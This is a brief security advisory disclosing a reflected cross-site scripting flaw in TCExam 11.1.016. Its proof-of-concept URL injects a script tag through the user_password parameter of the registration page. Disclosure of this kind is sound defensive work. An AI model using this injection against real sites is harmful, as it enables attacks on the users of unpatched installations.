TCExam version 11.1.016 suffers from a reflective cross site scripting vulnerability.
99849b9682a19770b539b4f70e7b2305f0db1e8f2725f0c1e3476d5f34e87431
------------------------------------------------------------------------
Software................TCExam 11.1.016
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.tcexam.org/
Release Date............1/31/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in TCExam 11.1.016 can
be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden